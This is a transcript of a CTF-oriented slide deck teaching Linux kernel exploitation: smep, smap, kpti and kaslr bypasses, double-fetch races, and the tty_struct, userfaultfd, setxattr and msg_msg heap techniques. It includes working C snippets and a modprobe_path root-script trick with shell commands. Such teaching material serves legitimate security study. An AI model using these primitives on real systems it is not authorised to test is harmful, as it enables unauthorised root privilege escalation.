
Kernel Exploitation

yuawn
December 19, 2020



Transcript

  1. Outline
    • Linux kernel concepts & debug
    • Kernel protection
      • smep, smap, kaslr, kpti
    • Leak & useful structures
      • tty_struct, shm_file_data, msg_msg ...
    • Kernel common vulnerabilities
      • double fetch
      • race condition
    • Exploitation & tricks
      • ret2usr - bypass smep, smap, kpti
      • signal handler
      • modprobe_path
      • userfaultfd, setxattr, msgsnd & msgrcv, ...
    • ROOT
  2. Kernel
    • Software
    • Implements syscalls
    • Communicates with hardware
    • Intel CPU ring model:
      • ring 0, ring 1, ring 2, ring 3
      • ring 0: kernel space
      • ring 3: user space
    • [Diagram labels: Applications, OS, kernel, hardware: CPU, Memory, Disk, Devices]
  3. Kernel - LKM
    • Loadable kernel module
    • Programs running in kernel space
      • drivers
      • kernel extensions
    • [Diagram labels: Applications, OS, kernel, kernel module, hardware: CPU, Memory, Disk, Devices]
  4. Kernel - functions
    • copy_from_user(void *to, const void __user *from, unsigned long n)
    • copy_to_user(void __user *to, const void *from, unsigned long n)
    • printk()
    • kmalloc()
    • kfree()
  5. Kernel Pwn
    • Kernel exploitation
    • Privilege escalation
      • Linux root account
    • User space to kernel space
      • ring 3 -> ring 0
  6. Kernel Pwn
    • Modified kernel
      • Mobile: Android, ARM TrustZone
      • IoT
    • Kernel module
    • Original Linux kernel
      • CVE
    • [Diagram labels: Hypervisor, ARM Trusted Firmware, APPs, Trusted APPs, OS (kernel), Trusted OS]
  7. CTF Prepare - files
    • bzImage - kernel
    • initramfs.cpio.gz - file system
    • run.sh - shell script for running qemu
  8. CTF Prepare - running script
    • run.sh
      • How to run with qemu
      • Check kernel protections: smep, smap, kaslr
    • https://github.com/torvalds/linux/blob/master/Documentation/admin-guide/kernel-parameters.txt

    #!/bin/bash
    qemu-system-x86_64 \
        -kernel ./bzImage \
        -initrd ./initramfs.cpio.gz \
        -nographic \
        -monitor none \
        -cpu qemu64,+smep,+smap \
        -append "console=ttyS0 kaslr panic=1" \
        -no-reboot \
        -m 256M
  9. CTF Prepare - kernel
    • bzImage
    • https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux
    • $ ./extract-vmlinux.sh bzImage > vmlinux
    • vmlinux: ELF 64-bit LSB executable, x86-64
    • Static analysis
    • Find kernel ROP gadgets:
      • $ ropper --nocolor --file ./vmlinux > rop
  10. CTF Prepare - file system
    • initramfs.cpio.gz
    • $ gunzip initramfs.cpio.gz && cpio -idv < initramfs.cpio
    • Extracted file system:
      • /challenge.ko - kernel module
      • /init
      • /flag
        • -r-------- 1 root 0 /flag
  11. CTF Prepare - init file
    • /init
      • Read it to see how the challenge sets up its environment
      • insmod challenge.ko
      • echo 1 > /proc/sys/kernel/kptr_restrict
        • 0 -> no restrictions
        • 1 -> the user needs the CAP_SYSLOG capability (root)
        • 2 -> %pK is always replaced with 0, regardless of privileges
      • echo 1 > /proc/sys/kernel/dmesg_restrict
        • 0 -> no restrictions
        • 1 -> the user needs the CAP_SYSLOG capability (root)
  12. CTF Prepare - .ko
    • /challenge.ko
      • The main challenge binary
      • Usually implemented as a miscdevice or a driver: after open(), user space talks to the kernel module through ioctl or file operations
      • /dev/challenge
      • /proc/challenge
  13. CTF Prepare - exploit
    • Write the exploit in C (or another language) and compile it into an exploit binary
    • Upload it into the qemu VM on the remote server
      • printf "" >> exp
      • echo "" | base64 -d >> exp
    • $ musl-gcc -static exp.c -o exp
      • Lightweight libc: shrinks the exp binary and shortens upload time
      • $ sudo apt install musl-tools
    • Run the exploit from the shell
  14. Debug
    • $ dmesg
      • printk()
    • $ cat /proc/kallsyms
      • function symbols
      • find the kernel base:
        • $ cat /proc/kallsyms | grep _text | head -n 1
    • $ cat /proc/modules
      • find the kernel module base:
        • $ cat /proc/modules | grep <module name>
    • $ cat /proc/slabinfo
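
The `grep _text | head -n 1` lookup can also be done from inside an exploit binary. The following is a minimal sketch, assuming kallsyms-style lines of the form `<hex address> <type> <symbol>`; the helper names `parse_kallsyms_line` and `find_symbol` are made up for illustration. When kptr_restrict hides addresses from the current user, the addresses read as zero and the lookup returns 0.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: parse one /proc/kallsyms-style line such as
 * "ffffffff81000000 T _text" and return the address if the symbol
 * name equals `want`, or 0 otherwise. */
unsigned long parse_kallsyms_line(const char *line, const char *want)
{
    unsigned long addr = 0;
    char type = 0;
    char name[256];

    if (sscanf(line, "%lx %c %255s", &addr, &type, name) != 3)
        return 0;
    return strcmp(name, want) == 0 ? addr : 0;
}

/* Scan a kallsyms-format file for `want`. Returns 0 if the file cannot
 * be opened, the symbol is missing, or its address is hidden. */
unsigned long find_symbol(const char *path, const char *want)
{
    char line[512];
    unsigned long addr = 0;
    FILE *fp = fopen(path, "r");

    if (!fp)
        return 0;
    while (addr == 0 && fgets(line, sizeof(line), fp))
        addr = parse_kallsyms_line(line, want);
    fclose(fp);
    return addr;
}
```

A call such as `find_symbol("/proc/kallsyms", "_text")` would then stand in for the shell pipeline on the slide.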
  15. Debug
    • Edit the init file to get root privileges, which makes debugging easier
      • change: setsid cttyhack setuidgid 1000 sh
      • to: setsid cttyhack setuidgid 0 sh
    • Repack the file system for qemu:
      • $ find . -print0 | cpio --null -ov --format=newc > rootfs.cpio 2>/dev/null
  16. Debug
    • run.sh qemu-system-x86_64
      • -s: open the gdb debug port on the default port 1234
      • -S: halt the CPU at startup
      • -append "nokaslr": disable kaslr
    • Connect with gdb
      • target remote localhost:1234
      • add-symbol-file challenge.ko baseaddr
      • add-symbol-file vmlinux baseaddr
  17. smep
    • Supervisor Mode Execution Prevention
    • In ring 0 (kernel mode), user space code cannot be executed
    • Recorded in the cr4 register
  18. smap
    • Supervisor Mode Access Prevention
    • Similar to smep: in ring 0 (kernel mode), user space memory cannot be accessed
    • Recorded in the cr4 register
  19. kpti
    • Kernel page-table isolation
    • cr3 register
      • page-table entry
    • Effect is similar to smep + smap
    • Meltdown, Spectre
    • $ dmesg | grep "Kernel/User page tables isolation: enabled"
  20. Leak
    • CVE
      • 1 day
      • 0 day
    • Vulnerable implementation in kernel module
      • Same concepts as in ordinary (user space) exploitation
      • uninitialized memory
      • oob or arbitrary read/write
      • race condition
      • ...
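  21. Leak
    • If memory is left uncleared or uninitialized, copy_to_user() can write addresses back to user space and leak the residual content.
    • If the requested kernel heap memory is not cleared or initialized, the exploit binary in user space should first perform operations that make the kernel allocate heap memory, so that kernel text, kernel stack, and kernel heap addresses are left behind on the kernel heap and the heap chunk later handed to the kernel module contains them.
    • The idea is similar to user space heap exploitation: free a chunk into the unsorted bin so that libc addresses appear on the heap.
    • The goal is to find kernel structures that work well for this and allocate them.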
  22. useful structure for leak
    • Easy to allocate and free from user space
    • Suitable size, so the same chunk is likely to be handed out again later
      • heap spray
      • depends on whether the kmalloc() size can be controlled
    • Structure full of pointers
      • kernel text, heap, stack
      • vtable: function pointers
  23. useful structure for leak
    • tty_struct (0x2e0, 0x2c0): base, heap
    • shm_file_data (0x20): base, heap
    • seq_operations (0x20): base
    • msg_msg (0x30 ~ 0x1000): heap
    • subprocess_info (0x60): base, heap
    • ...
    • Any other structure you find usable
    • Structure sizes change with the kernel version
    • https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
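
A "base" leak in the list above means that the structure holds a pointer into kernel text, so one leaked value is enough to undo kaslr. A minimal sketch of that arithmetic follows; the two offsets are hypothetical placeholders, and real values have to be taken from the vmlinux of the target kernel.

```c
#include <stdint.h>

/* Hypothetical offsets, for illustration only. Real values come from the
 * target kernel's vmlinux or from /proc/kallsyms with nokaslr. */
#define OFF_LEAKED_SYMBOL UINT64_C(0xc3a2e0)
#define OFF_COMMIT_CREDS  UINT64_C(0x0c0540)

/* Kernel base = leaked pointer minus that symbol's offset from the base. */
uint64_t kernel_base_from_leak(uint64_t leaked, uint64_t symbol_offset)
{
    return leaked - symbol_offset;
}

/* Address of any other symbol or gadget = base plus its offset. */
uint64_t rebase(uint64_t kernel_base, uint64_t offset)
{
    return kernel_base + offset;
}
```

Every gadget address found with ropper in vmlinux can be rebased the same way once the base is known.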
  24. tty_struct
    • Leak: base, heap
    • Size: 0x2c0
      • This size is rarely used, so it is easy to get the same chunk back
    • Easy to trigger from user land:
      • int pfd = open("/dev/ptmx", O_RDWR|O_NOCTTY);
    • tty_operations
      • Similar to a vtable: stores the function pointers for tty operations such as open, write, close, ioctl ...
      • With a UAF or similar primitive, overwrite the struct tty_operations pointer so it points into a controlled region. For example, after replacing the write operation pointer, calling write(pfd, ,) on the tty gives control of kernel rip.

    struct tty_struct {
        int magic;
        struct kref kref;
        struct device *dev;
        struct tty_driver *driver;
        const struct tty_operations *ops;
        int index;
        /* Protects ldisc changes: Lock tty not pty */
        struct ld_semaphore ldisc_sem;
        struct tty_ldisc *ldisc;
        ...
  25. tty_operations
    • include/linux/tty_driver.h

    struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        int (*write_room)(struct tty_struct *tty);
        int (*chars_in_buffer)(struct tty_struct *tty);
        int (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ....
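  26. heap spray tty_struct

    int pfd[0x100];

    /* Each open() of /dev/ptmx makes the kernel allocate a tty_struct. */
    for (int i = 0; i < 0x100; ++i)
        pfd[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);  // tty_struct

    /* Closing the descriptors releases the tty_struct objects again. */
    for (int i = 0; i < 0x100; ++i)
        close(pfd[i]);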
  27. double fetch
    • A race condition between kernel space and user space
    • The kernel reads the same user space data twice, which leaves a race window between the two reads
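
The double-fetch pattern can be simulated entirely in user space. The sketch below is not kernel code: `struct request` stands in for user memory, and the `race_hook` callback stands in for a second user thread that runs between the two fetches. All names are made up for illustration. It contrasts the vulnerable handler with a fixed one that fetches once into a local copy.

```c
#include <stddef.h>

#define BUF_CAP 0x100

/* Stand-in for a request that lives in user memory. */
struct request {
    size_t len;
};

/* Stand-in for a racing user thread that runs between the fetches. */
typedef void (*race_hook)(struct request *);

/* Vulnerable pattern: len is read from "user memory" twice.
 * Returns the length the handler would use, or -1 if the check fails. */
long handle_double_fetch(struct request *user_req, race_hook racer)
{
    if (user_req->len >= BUF_CAP)       /* 1st fetch (check) */
        return -1;
    if (racer)
        racer(user_req);                /* race window */
    return (long)user_req->len;         /* 2nd fetch (use) */
}

/* Fixed pattern: fetch once, then check and use only the local copy. */
long handle_single_fetch(struct request *user_req, race_hook racer)
{
    size_t len = user_req->len;         /* the only fetch */

    if (len >= BUF_CAP)
        return -1;
    if (racer)
        racer(user_req);                /* too late to matter */
    return (long)len;
}

/* Racer that rewrites the length after the check has passed. */
void grow_len(struct request *req)
{
    req->len = 0x1000;
}
```

With a request whose length starts at 0x30, the vulnerable handler ends up using 0x1000 even though its check passed, while the fixed handler still uses 0x30.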
  28-30. double fetch (diagram: no race)
    • User space: the program issues a syscall/ioctl; memory 0x401000 holds 0x30
    • Kernel space: the kernel module performs the 1st fetch (check) with copy_from_user(): 0x30 < 0x100 is True
    • Kernel space: the 2nd fetch (use) with copy_from_user() reads memory 0x401000 again, still 0x30
  31-36. double fetch (diagram: race)
    • User space: the program issues a syscall/ioctl; memory 0x401000 holds 0x30
    • Kernel space: 1st fetch (check) with copy_from_user(): 0x30 < 0x100 is True
    • User space: modify user data, memory 0x401000 now holds 0x1000
    • Kernel space: 2nd fetch (use) with copy_from_user() reads 0x1000; 0x1000 < 0x100 is False, but the check has already passed
    • Pwned ☠
  37. ret2user
    • User mode cannot access kernel space; kernel mode can access user space
    • While executing in kernel mode, return to user space and run user code with ring 0 privileges
      • control kernel rip
    • Status Switch
      • user space to kernel space
      • kernel space to user space
      • arch/x86/entry/entry_64.S
  38. ret2user
    • Status Switch
      • kernel space to user space
        • Restore the GS value with the swapgs instruction
        • iret instruction
          • iretq
        • Register values are stored on the stack
    • [Diagram: kernel rsp points at a "swapgs ; ret" gadget, then iretq, then the frame that iretq pops: user space rip, user cs, user rflags, user sp, user ss]
  39. ret2user
    • Status Switch
      • kernel space to user space
        • Save status

    #include <stdio.h>

    size_t user_cs, user_ss, user_rflags, user_sp;

    /* The inline asm is written in Intel syntax: build with -masm=intel. */
    void save_status() {
        __asm__("mov user_cs, cs;"
                "mov user_ss, ss;"
                "mov user_sp, rsp;"
                "pushf;"
                "pop user_rflags;"
                );
        puts("[*]status has been saved.");
    }
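
The saved values are what iretq later pops to get back to user mode. As a sketch of that stack layout, the struct below lists the five quadwords in the order iretq consumes them, lowest address first. The struct and function names are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* The five quadwords iretq pops, lowest address first. */
struct iret_frame {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
};

/* Build a frame that resumes user mode at user_rip with the saved state. */
struct iret_frame make_iret_frame(uint64_t user_rip, uint64_t user_cs,
                                  uint64_t user_rflags, uint64_t user_sp,
                                  uint64_t user_ss)
{
    struct iret_frame frame;

    frame.rip = user_rip;
    frame.cs = user_cs;
    frame.rflags = user_rflags;
    frame.rsp = user_sp;
    frame.ss = user_ss;
    return frame;
}
```

In a ROP chain, these five values would sit directly after the iretq gadget, filled from user_cs, user_rflags, user_sp and user_ss as saved by save_status().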
  40. Bypass smep
    • ROP
      • Same idea as bypassing NX
      • Move the kernel stack pointer (rsp) into user space and ROP there
      • ROP directly in the kernel
  41. Bypass smap
    • ROP on a user space stack is dead
    • Disallows explicit supervisor-mode data accesses to user-mode pages
    • How do copy_from_user() and copy_to_user() work?
  42-44. Bypass smap
    • arch/x86/lib/copy_user_64.S
    • instruction
      • stac - allow
      • clac - disallow

    SYM_FUNC_START(copy_user_generic_unrolled)
        ASM_STAC
        cmpl $8,%edx
        jb 20f          /* less then 8 bytes, go to byte copy loop */
        ALIGN_DESTINATION
        movl %edx,%ecx
        andl $63,%edx
        shrl $6,%ecx
        jz .L_copy_short_string
        ...
        movl %edx,%ecx
    21: movb (%rsi),%al
    22: movb %al,(%rdi)
        incq %rsi
        incq %rdi
        decl %ecx
        jnz 21b
    23: xor %eax,%eax
        ASM_CLAC
        ret
  45. Bypass smap
    • instruction
      • stac - allow
      • clac - disallow
    • Only allowed in kernel mode; they fault in user space.
  46. Bypass smap
    • Overwrite the cr4 register
      • First do some work in the kernel (ROP, ...) to overwrite the cr4 register -> 0x6f0
      • With smep and smap turned off, return to user space to execute code or ROP
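
The value 0x6f0 is simply a cr4 value with the smep and smap bits cleared: smep is bit 20 and smap is bit 21 of cr4. A small sketch of the bit arithmetic, where the starting value 0x3006f0 is an assumed example of a cr4 with both protections on:

```c
#include <stdint.h>

#define CR4_SMEP (UINT64_C(1) << 20)    /* CR4.SMEP */
#define CR4_SMAP (UINT64_C(1) << 21)    /* CR4.SMAP */

/* Value to write into cr4 so that smep and smap are both disabled. */
uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}

/* Report whether each protection is enabled in a given cr4 value. */
int cr4_has_smep(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
int cr4_has_smap(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }
```

Reading the current cr4 from a kernel panic log or a debugger and masking it this way is safer than hard-coding 0x6f0, since other cr4 bits differ between machines.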
  47. ret2user
    • Constraints
      • bypass smep
        • Move the kernel stack pointer (rsp) into user space and ROP there
        • ROP directly in the kernel
      • bypass smap
        • First do some work in the kernel (ROP, ...) to overwrite the cr4 register -> 0x6f0
        • With smep and smap turned off, return to user space to execute code or ROP
      • kpti
        • fix the cr3 register - page table
        • swapgs_restore_regs_and_return_to_usermode()
  48-49. privilege escalation
    • ROP
      • commit_creds(prepare_kernel_cred(0))
    • ret2user -> system("/bin/sh")
      • spawn a root shell!
    • ROOT ☠
  50. modprobe_path
    • Kernel global variable
    • Default path: /sbin/modprobe
    • $ cat /proc/sys/kernel/modprobe
    • When a file in an executable format the kernel does not recognize is executed, the kernel runs the file at this path with root privileges.
  51. modprobe_path
    • Call chain: sys_execve -> do_execve() -> do_execveat_common() -> bprm_execve() -> exec_binprm() -> search_binary_handler() -> request_module() -> call_modprobe() -> call_usermodehelper_exec()

    static int search_binary_handler(struct linux_binprm *bprm)
    {
        ...
        if (need_retry) {
            if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
                printable(bprm->buf[2]) && printable(bprm->buf[3]))
                return retval;
            if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
                return retval;
            need_retry = false;
            goto retry;
        }
        ...
  52-53. modprobe_path
    • Exploitation
      • Overwrite modprobe_path with the path of your own shell script, /tmp/x
        • $ echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x
        • $ chmod +x /tmp/x
      • Execute a file with a broken executable format (the first four bytes must not be printable)
        • $ echo -ne '\xff\xff\xff\xff' > /tmp/fake
        • $ chmod +x /tmp/fake && /tmp/fake
      • The kernel runs /tmp/x with root privileges
      • cat /flag
    • ROOT ☠
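
The user space half of this trick can also be done from the exploit binary instead of the shell. The sketch below only prepares the two files and does not touch modprobe_path, which still has to be overwritten through a kernel bug. The function names and the `dir` parameter are made up for illustration; the slides use /tmp directly.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write len bytes to path and set its mode. Returns 0 on success. */
static int write_file(const char *path, const void *data, size_t len,
                      mode_t mode)
{
    ssize_t written;
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);

    if (fd < 0)
        return -1;
    written = write(fd, data, len);
    close(fd);
    if (written != (ssize_t)len)
        return -1;
    return chmod(path, mode);           /* make sure it is executable */
}

/* Create <dir>/x (the helper script) and <dir>/fake (the trigger file). */
int prepare_modprobe_files(const char *dir)
{
    static const char script[] = "#!/bin/sh\n/bin/chmod 777 /flag\n";
    /* Four non-printable bytes, so search_binary_handler() falls
     * through to request_module(). */
    static const unsigned char magic[4] = { 0xff, 0xff, 0xff, 0xff };
    char path[256];

    snprintf(path, sizeof(path), "%s/x", dir);
    if (write_file(path, script, sizeof(script) - 1, 0755) != 0)
        return -1;
    snprintf(path, sizeof(path), "%s/fake", dir);
    return write_file(path, magic, sizeof(magic), 0755);
}
```

After modprobe_path points at the script, executing the trigger file makes the kernel run the script as root.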
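  54. userfaultfd
    • syscall - 323
    • Register a userfault memory region and implement your own page fault handler
      • You control how page faults are handled
    • When the kernel runs copy_from_user() or copy_to_user(), accessing the registered user memory triggers a page fault, and your page fault handler decides how it is handled.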
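  55. userfaultfd
    • Effect when applied to exploitation
      • race condition friendly
      • Sleeping in the page fault handler stalls the kernel's execution flow
      • Other operations can run before the fault is resolved, which controls the order of execution
      • The scenario that triggers the race condition happens reliably, with no need to rely on luck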
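
The registration and handling steps can be sketched as follows. This is a minimal outline, assuming Linux with the userfaultfd headers installed; the function names are made up for illustration. Newer kernels may refuse userfaultfd to unprivileged users (vm.unprivileged_userfaultfd), in which case `uffd_register` returns -1. In an exploit, `uffd_serve_one` would run in its own thread while another thread makes the kernel touch the registered page.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Create a userfaultfd and register [addr, addr + len) for missing-page
 * faults. Returns the fd, or -1 if userfaultfd is unavailable here. */
int uffd_register(void *addr, size_t len)
{
    struct uffdio_api api = { .api = UFFD_API, .features = 0 };
    struct uffdio_register reg = {
        .range = { .start = (uintptr_t)addr, .len = len },
        .mode = UFFDIO_REGISTER_MODE_MISSING,
    };
    int fd = (int)syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);

    if (fd < 0)
        return -1;
    if (ioctl(fd, UFFDIO_API, &api) < 0 ||
        ioctl(fd, UFFDIO_REGISTER, &reg) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Wait up to timeout_ms for one fault, then resolve it by copying
 * src_page into the faulting page.
 * Returns 1 if a fault was served, 0 on timeout, -1 on error. */
int uffd_serve_one(int fd, const void *src_page, size_t page_size,
                   int timeout_ms)
{
    struct pollfd pfd = { .fd = fd, .events = POLLIN };
    struct uffd_msg msg;
    struct uffdio_copy copy = { 0 };
    int ready = poll(&pfd, 1, timeout_ms);

    if (ready <= 0)
        return ready;
    if (read(fd, &msg, sizeof(msg)) != (ssize_t)sizeof(msg) ||
        msg.event != UFFD_EVENT_PAGEFAULT)
        return -1;
    /* An exploit would stall here (sleep, free or reallocate objects)
     * while the kernel is stuck inside copy_from_user(). */
    copy.dst = msg.arg.pagefault.address & ~((uint64_t)page_size - 1);
    copy.src = (uintptr_t)src_page;
    copy.len = page_size;
    return ioctl(fd, UFFDIO_COPY, &copy) == 0 ? 1 : -1;
}
```

The faulting thread stays blocked until the UFFDIO_COPY completes, which is what makes the ordering of the race deterministic.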
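  56. setxattr
    • syscall - 188
    • From user space, setxattr directly reaches kvmalloc() with a requested size in the range 1 ~ 65536 (0x10000) and copies user land data into the allocation.
    • setxattr + userfaultfd combo
      • Often chained with userfaultfd to stall the copy_from_user() in the middle. Because you decide when the page fault is resolved and setxattr continues, you indirectly control when kfree() happens, which is convenient for building a UAF.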
  57-58. setxattr
    • linux-5.9.12/fs/xattr.c#510

    static long
    setxattr(struct dentry *d, const char __user *name,
             const void __user *value, size_t size, int flags)
    {
        int error;
        void *kvalue = NULL;
        char kname[XATTR_NAME_MAX + 1];

        if (flags & ~(XATTR_CREATE|XATTR_REPLACE))
            return -EINVAL;

        error = strncpy_from_user(kname, name, sizeof(kname));
        if (error == 0 || error == sizeof(kname))
            error = -ERANGE;
        if (error < 0)
            return error;

        if (size) {
            if (size > XATTR_SIZE_MAX)
                return -E2BIG;
            kvalue = kvmalloc(size, GFP_KERNEL);
            if (!kvalue)
                return -ENOMEM;
            if (copy_from_user(kvalue, value, size)) {
                error = -EFAULT;
                goto out;
            }
            if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) ||
                (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0))
                posix_acl_fix_xattr_from_user(kvalue, size);
            else if (strcmp(kname, XATTR_NAME_CAPS) == 0) {
                error = cap_convert_nscap(d, &kvalue, size);
                if (error < 0)
                    goto out;
                size = error;
            }
        }

        error = vfs_setxattr(d, kname, kvalue, size, flags);
    out:
        kvfree(kvalue);

        return error;
    }
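  59. setxattr + userfaultfd
    • Use userfaultfd to stall the copy_from_user() inside setxattr so that it does not kfree() right away
    • When the chunk should be kfree()d, the custom userfaultfd page fault handler copies in a prepared mmap'd page to resolve the page fault, which lets setxattr continue and reach kfree()
    • Solves the drawback that setxattr gives full control over the kmalloc() timing, size, and content but no control over the kfree() timing.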
  60. setxattr + userfaultfd
    • With the combo, user land can directly:
      • call kmalloc() at any time
      • use a size range that covers almost every need: 1 ~ 65536 (0x10000)
      • fully control the chunk content from user land
      • with userfaultfd, choose when kfree() happens
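
One common way to arrange the stall, shown here as an assumption rather than something the slides spell out, is to place the value buffer so that it ends a few bytes inside a userfaultfd-registered page. copy_from_user() then fills most of the chunk from normal memory and blocks on the final bytes. The helper name `straddle_start` is made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Given the start of a userfaultfd-registered page, return where a value
 * buffer of `size` bytes must begin so that only its last `tail` bytes
 * fall inside the registered page. The memory just below fault_page must
 * be mapped normally and hold the payload. */
uint8_t *straddle_start(uint8_t *fault_page, size_t size, size_t tail)
{
    return fault_page - (size - tail);
}
```

The returned pointer would be passed as the `value` argument of setxattr(path, name, value, size, flags), with `size` chosen to match the target kmalloc cache.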
  61. msg_msg
    • int qid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)
    • msgsnd(qid, &msgbuf, real_size - 0x30, 0)
      • kmalloc(size+0x30)
      • Copies the msgbuf content to chunk + 0x30; the first 0x30 bytes are the header
    • msgrcv(qid, &msgbuf, real_size - 0x30, 1, 0)
      • kfree
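  62. msg_msg
    • Pros
      • Easy to control kmalloc() and kfree() from user land
      • The code is easy to write
      • The kfree() timing is easier to control than with setxattr + userfaultfd: just call msgrcv()
    • Cons
      • The first 0x30 bytes of the kmalloc'd chunk are hard to control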
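
The msgsnd/msgrcv pair can be wrapped into two small helpers. This is a sketch that takes the 0x30-byte header size from the slides and keeps each message within a single 0x1000-byte chunk; the names `msg_alloc`, `msg_free` and `struct spray_msg` are made up for illustration.

```c
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#define MSG_HDR   0x30          /* msg_msg header size, as in the slides */
#define MAX_CHUNK 0x1000        /* largest chunk size handled here */

struct spray_msg {
    long mtype;                 /* must be greater than 0 */
    char mtext[MAX_CHUNK - MSG_HDR];
};

/* Send one message so that the kernel allocates about chunk_size bytes
 * (header plus payload). payload must hold chunk_size - MSG_HDR bytes.
 * Returns 0 on success, -1 on error. */
int msg_alloc(int qid, const void *payload, size_t chunk_size)
{
    struct spray_msg m;
    size_t n;

    if (chunk_size <= MSG_HDR || chunk_size > MAX_CHUNK)
        return -1;
    n = chunk_size - MSG_HDR;
    m.mtype = 1;
    memcpy(m.mtext, payload, n);
    return msgsnd(qid, &m, n, 0);
}

/* Receive the message again, which makes the kernel free the chunk.
 * Returns the number of payload bytes copied to out, or -1 on error. */
long msg_free(int qid, void *out, size_t chunk_size)
{
    struct spray_msg m;
    ssize_t n;

    if (chunk_size <= MSG_HDR || chunk_size > MAX_CHUNK)
        return -1;
    n = msgrcv(qid, &m, chunk_size - MSG_HDR, 1, 0);
    if (n > 0)
        memcpy(out, m.mtext, (size_t)n);
    return (long)n;
}
```

For example, `msg_alloc(qid, buf, 0x40)` requests a 0x40-byte chunk whose last 0x10 bytes come from `buf`, and `msg_free(qid, out, 0x40)` releases it at a moment of your choosing.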